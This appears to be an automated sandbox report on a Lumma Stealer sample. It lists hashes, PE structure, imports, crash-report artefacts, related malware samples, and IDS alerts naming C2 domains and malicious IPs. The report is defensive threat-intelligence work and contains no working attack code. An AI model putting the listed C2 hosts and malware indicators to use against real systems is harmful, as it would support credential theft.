Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	H1iOI9vWfh.exe renamed because original name is a hash value
Original Sample Name:	482beb4e122303712335daed6df6a4dd.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/5@10/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 22 Number of non-executed functions: 229
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.20, 52.149.20.212, 20.190.181.1
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:48:31	API Interceptor	15x Sleep call for process: H1iOI9vWfh.exe modified
03:48:58	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.66.86	MV ROCKET_PDA.exe	Get hash	malicious	FormBook	Browse	www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
23.55.153.106	8WFJ38EJo5.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	FfcoO2Giru.exe	Get hash	malicious	LummaC	Browse
	N36e6JFEp6.exe	Get hash	malicious	LummaC	Browse
	k7T6akLcAr.exe	Get hash	malicious	LummaC	Browse
	SPzPNCzcCy.exe	Get hash	malicious	LummaC	Browse
	hx0wBsOjkQ.exe	Get hash	malicious	LummaC	Browse
	MrIOYC1Pns.exe	Get hash	malicious	LummaC	Browse
	fnnGMmd8eJ.exe	Get hash	malicious	LummaC	Browse
	PW6pjyv02h.exe	Get hash	malicious	LummaC	Browse
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
lev-tolstoi.com	8WFJ38EJo5.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.66.86
	FfcoO2Giru.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	k7T6akLcAr.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	SPzPNCzcCy.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	hx0wBsOjkQ.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	fnnGMmd8eJ.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	Script.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	Aura.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	Installer.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
steamcommunity.com	8WFJ38EJo5.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.55.153.106
	FfcoO2Giru.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	N36e6JFEp6.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	k7T6akLcAr.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	SPzPNCzcCy.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	hx0wBsOjkQ.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	MrIOYC1Pns.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	fnnGMmd8eJ.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	PW6pjyv02h.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	23.55.153.106

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASN1EU	8WFJ38EJo5.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.55.153.106
	FfcoO2Giru.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	FLKCAS1DzH.bat	Get hash	malicious	Unknown	Browse	23.44.201.12
	N36e6JFEp6.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	k7T6akLcAr.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	SPzPNCzcCy.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	hx0wBsOjkQ.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	MrIOYC1Pns.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	fnnGMmd8eJ.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	PW6pjyv02h.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
CLOUDFLARENETUS	8WFJ38EJo5.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.66.86
	FfcoO2Giru.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	FLKCAS1DzH.bat	Get hash	malicious	Unknown	Browse	172.64.41.3
	j2nLC29vCy.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
	k7T6akLcAr.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	SPzPNCzcCy.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	es5qBEFupj.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	hx0wBsOjkQ.exe	Get hash	malicious	LummaC	Browse	172.67.157.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	8WFJ38EJo5.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.66.86 23.55.153.106
	FfcoO2Giru.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106
	N36e6JFEp6.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106
	j2nLC29vCy.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106
	k7T6akLcAr.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106
	SPzPNCzcCy.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106
	es5qBEFupj.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106
	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106
	hx0wBsOjkQ.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_H1iOI9vWfh.exe_a456159bd056bfea82ee66a91bb0b8f857cb2736_f85504bc_4201d038-09c5-4db6-b946-6412d755a657\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0583240635118127
Encrypted:	false
SSDEEP:	192:GvrQb9Pn0gJ4fju3mF6zuiF7Z24IO8L8:OrQb98gJ4fjL6zuiF7Y4IO8L
MD5:	76D638C51C7A16676DE16F0B3A776850
SHA1:	95F2E6B3567194DD235937CA2D9BAC1AA6622FE7
SHA-256:	78EA8C88762E047E352E34C4D483918AF49C4480840A8C75E0C1D6D24EE23025
SHA-512:	3BC047BD2438E232F131C71BEBF25CB72C1FB439A4AD04164BC7DD7AD194566A41D515100918154E54AA7942C32D8CD660639A7CCFBFACDD3AAE9EC2E9F1A337
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.8.4.9.3.2.8.3.0.2.5.5.9.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.8.4.9.3.2.9.9.7.4.4.4.0.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.2.0.1.d.0.3.8.-.0.9.c.5.-.4.d.b.6.-.b.9.4.6.-.6.4.1.2.d.7.5.5.a.6.5.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.9.2.b.1.f.f.f.-.4.4.7.3.-.4.f.9.3.-.9.a.f.3.-.4.9.5.b.6.6.a.4.d.e.c.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.H.1.i.O.I.9.v.W.f.h...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.7.0.-.0.0.0.1.-.0.0.1.4.-.6.9.8.0.-.e.0.4.3.0.5.5.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.4.3.6.c.f.f.6.e.6.7.5.a.9.8.0.e.f.b.7.b.f.f.2.0.5.6.c.8.9.0.3.0.0.0.0.f.f.f.f.!.0.0.0.0.d.b.6.8.b.2.6.a.4.3.a.7.e.6.5.2.3.8.d.3.2.d.b.3.3.8.c.9.c.3.c.3.4.3.7.9.6.9.1.6.!.H.1.i.O.I.9.v.W.f.h...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER438E.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Dec 28 08:48:48 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	108922
Entropy (8bit):	2.1840005146686945
Encrypted:	false
SSDEEP:	768:rStVh1TB0jQTLx96n1QOKkHHSMJTfImNN5RKBL892V3:2tzkjQTLz6n1QyHHSMJTfIG4LeY
MD5:	B33A9B4632394FBCBEDB10221009822A
SHA1:	7634E687280DAAA1BDBD3ECA959E5665CD2EBF54
SHA-256:	D7E1CA8EFDC6B2B5B08BD6D171361ED51FBF1EB9C5AA62900243D0A72FA38A65
SHA-512:	7D87944E903BC850FE0F964A3B0295D43B555F7A877AC249D0428A8762048102D1AE3796CCD7C02DBE1DB4456A29EDB618CF724CC7142CBAAF849EAD5BAE28ED
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......p.og........................p...........\...h$......4....Q..........`.......8...........T...........(G..Rb...........%...........'..............................................................................eJ......H(......GenuineIntel............T.......p...\.og.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4881.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8364
Entropy (8bit):	3.702825036716387
Encrypted:	false
SSDEEP:	192:R6l7wVeJIQ6fpU+6Y+xSU9kiTgmfP1jpDB89betsf8Km:R6lXJH6fL6YISU9dTgmftIemfA
MD5:	AB4382FFAB08D0DB77836C5ACDE1A82C
SHA1:	DEEA011114C421CE170DDF109177BA143378B3BE
SHA-256:	E8F8A12EB56E5BEC911EAB0D2D983AD2E9880C843E5E4512830683A809F52D66
SHA-512:	DDC1DB5411F2324253E4DE37257F1C375D9723A34A34000AAF73ECF21DC2A7F80216B1CAEE77CE0BCA62FE8F0026985923EBAE8DA889D4A16D4A9EB6EBAEBFEB
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.2.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER48D0.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4623
Entropy (8bit):	4.500083169894197
Encrypted:	false
SSDEEP:	48:cvIwWl8zsfJg77aI9/djDGWpW8VYYdYm8M4JL91OqFfn+q88u2OvfJznAd:uIjfBI7FdjDH7V+JTjhsBznAd
MD5:	110AA29FF87C4C93160EDCDC134A8DBF
SHA1:	C92E083CFDA1A09ABE1699AF8E3EF1B374658306
SHA-256:	4A3294B5DF68079E7C4499420CC82D218480AE6BE571EC53FB1A04BD643D4D3B
SHA-512:	6000FCE2C50BE29B76FD45D8FCE7B8506B331A6E22A1D0564E01A558933EFE1588E114E389746B0B915C07C33F6539DD294E862774102A645B80B3F95F2A7925
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="650871" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.568440950745289
Encrypted:	false
SSDEEP:	6144:5oPefZnQMa3tfL9bn90foomgsattlbSldrUHT7hSgkSNv0juQJYchUJvTGAXBsL6:aPZAooVJHnsg/d1TVqG
MD5:	9C9DADABB650AC263A8473CDF791EDD0
SHA1:	386AA56DA7364BDC53C311B1D40D73C1AA33C246
SHA-256:	3D6942C29176A901D9E42B496607E88046B682CB409355F191F6A5BEE03A9360
SHA-512:	DB240A54360FE44D99F970409A77782A3C9079D1FF7894116B683B37FEEC9A6279FF2139D4CE0FAFF30844B7FA9EA82CA48212E592B6923C53DCC4A0EED669DD
Malicious:	false
Reputation:	low
Preview:	regfJ...J....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.O.Y..............................................................................................................................................................................................................................................................................................................................................Q(.{........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.420105179313753
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	H1iOI9vWfh.exe
File size:	375'808 bytes
MD5:	482beb4e122303712335daed6df6a4dd
SHA1:	db68b26a43a7e65238d32db338c9c3c343796916
SHA256:	5a86892621cf79383706c55d1d0a17db2982439fc252964a964a42c7b1ffd1a3
SHA512:	3115c3af58da83c00edb24e8067a6963ad83134288536a898513a4d6dd215fa97ad31cef63f88f05542d68e83ac80e84918a6c63aae6dd4b6991f4dc540673e8
SSDEEP:	6144:Zl+TwqAfK2IHmHh7MirU/OVYDtFaMgpo8R07s3zLjMmzjo:ZAUyWhwuQ2etoMgphSCrMwk
TLSH:	2B84BE2076F19025FFF74B341A70E6A45ABB7C636A71819F3290361E2E736918E2D713
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......).`.mq..mq..mq...>..oq..s#..sq..s#..yq..s#...q..J.u.jq..mq...q..s#..lq..s#..lq..s#..lq..Richmq..................PE..L....>.e...

File Icon


Icon Hash:	8f9731253125191a

Static PE Info

General

Entrypoint:	0x401453
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x651D3EF1 [Wed Oct 4 10:31:13 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	9662782e6e9e28f2f28849063179bc57

Entrypoint Preview

Instruction
call 00007F81646C4AF9h
jmp 00007F81646C23DDh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0044B398h], eax
mov dword ptr [0044B394h], ecx
mov dword ptr [0044B390h], edx
mov dword ptr [0044B38Ch], ebx
mov dword ptr [0044B388h], esi
mov dword ptr [0044B384h], edi
mov word ptr [0044B3B0h], ss
mov word ptr [0044B3A4h], cs
mov word ptr [0044B380h], ds
mov word ptr [0044B37Ch], es
mov word ptr [0044B378h], fs
mov word ptr [0044B374h], gs
pushfd
pop dword ptr [0044B3A8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0044B39Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0044B3A0h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0044B3ACh], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0044B2E8h], 00010001h
mov eax, dword ptr [0044B3A0h]
mov dword ptr [0044B29Ch], eax
mov dword ptr [0044B290h], C0000409h
mov dword ptr [0044B294h], 00000001h
mov eax, dword ptr [00444004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00444008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000BCh]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4285c	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x423000	0xe788	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x41000	0x19c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3f53c	0x3f600	1d7ae3dfdfb4c327a8aea2cfb0738cee	False	0.8044871794871795	data	7.375070698594339	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x41000	0x21a2	0x2200	a40c4ec91a8e3a50ae9ad80605131980	False	0.36385569852941174	data	5.5512274229055185	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x44000	0x3decd8	0xb800	3f4b181f340ff1a7f94236f501d89d4b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x423000	0xe788	0xe800	08abed5f4dd6d08264fcd08279cfa5f9	False	0.40448208512931033	data	4.50844872166766	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_CURSOR	0x429e88	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0	0.4276315789473684
RT_CURSOR	0x429fd0	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0	0.7368421052631579
RT_CURSOR	0x42a100	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.06130705394190871
RT_ICON	0x423630	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	0.55863539445629
RT_ICON	0x4244d8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	0.6114620938628159
RT_ICON	0x424d80	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	0.6463133640552995
RT_ICON	0x425448	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	0.6719653179190751
RT_ICON	0x4259b0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	0.43734439834024896
RT_ICON	0x427f58	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	0.5124296435272045
RT_ICON	0x429000	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	0.5159836065573771
RT_ICON	0x429988	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	0.6108156028368794
RT_STRING	0x42c888	0x454	data	0.45126353790613716
RT_STRING	0x42cce0	0x126	data	0.5238095238095238
RT_STRING	0x42ce08	0x656	data	0.436498150431566
RT_STRING	0x42d460	0x74c	data	0.43147751605995716
RT_STRING	0x42dbb0	0x6a4	data	0.4376470588235294
RT_STRING	0x42e258	0x74c	data	0.4229122055674518
RT_STRING	0x42e9a8	0x70e	data	0.4330011074197121
RT_STRING	0x42f0b8	0x84e	data	0.4195672624647225
RT_STRING	0x42f908	0x662	data	0.43512851897184823
RT_STRING	0x42ff70	0x964	data	0.4068219633943428
RT_STRING	0x4308d8	0x66e	data	0.4356014580801944
RT_STRING	0x430f48	0x60a	data	0.444372574385511
RT_STRING	0x431558	0x22a	data	0.47653429602888087
RT_ACCELERATOR	0x429e68	0x20	data	1.15625
RT_GROUP_CURSOR	0x429fb8	0x14	data	1.15
RT_GROUP_CURSOR	0x42c6a8	0x22	data	1.088235294117647
RT_GROUP_ICON	0x429df0	0x76	data	0.6610169491525424
RT_VERSION	0x42c6d0	0x1b8	COM executable for DOS	0.575

Imports

DLL	Import
KERNEL32.dll	DeleteVolumeMountPointA, InterlockedDecrement, SetDefaultCommConfigW, GetEnvironmentStringsW, GetComputerNameW, GetModuleHandleW, GetDateFormatA, LoadLibraryW, GetConsoleMode, ReadProcessMemory, GetTimeFormatW, GetConsoleAliasW, CreateProcessA, GetAtomNameW, GetStartupInfoW, GetShortPathNameA, SetLastError, GetProcAddress, SearchPathA, PulseEvent, BuildCommDCBW, GetNumaHighestNodeNumber, LoadLibraryA, UnhandledExceptionFilter, InterlockedExchangeAdd, LocalAlloc, AddAtomA, FoldStringW, SetLocaleInfoW, RequestWakeupLatency, WriteConsoleOutputAttribute, FindFirstVolumeA, FindAtomW, UnregisterWaitEx, OpenFileMappingA, CreateFileA, WriteConsoleW, SetFileAttributesA, GetCommandLineW, MultiByteToWideChar, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetLastError, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, DeleteCriticalSection, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, LeaveCriticalSection, EnterCriticalSection, GetLocaleInfoA, InitializeCriticalSectionAndSpinCount, HeapAlloc, VirtualAlloc, HeapReAlloc, RtlUnwind, HeapSize, ReadFile, GetConsoleCP, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP, GetModuleHandleA
USER32.dll	GetClassLongW
GDI32.dll	GetBitmapBits

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-28T09:48:32.269641+0100	2058576	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz)	1	192.168.2.12	52022	1.1.1.1	53	UDP
2024-12-28T09:48:32.439990+0100	2058584	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz)	1	192.168.2.12	63819	1.1.1.1	53	UDP
2024-12-28T09:48:32.582215+0100	2058586	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz)	1	192.168.2.12	55902	1.1.1.1	53	UDP
2024-12-28T09:48:32.737635+0100	2058588	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz)	1	192.168.2.12	59941	1.1.1.1	53	UDP
2024-12-28T09:48:32.880819+0100	2058580	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz)	1	192.168.2.12	51301	1.1.1.1	53	UDP
2024-12-28T09:48:33.023644+0100	2058590	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz)	1	192.168.2.12	56534	1.1.1.1	53	UDP
2024-12-28T09:48:33.166899+0100	2058572	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz)	1	192.168.2.12	57509	1.1.1.1	53	UDP
2024-12-28T09:48:33.312981+0100	2058578	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz)	1	192.168.2.12	54403	1.1.1.1	53	UDP
2024-12-28T09:48:35.101953+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49711	23.55.153.106	443	TCP
2024-12-28T09:48:36.030833+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.12	49711	23.55.153.106	443	TCP
2024-12-28T09:48:37.558558+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49712	104.21.66.86	443	TCP
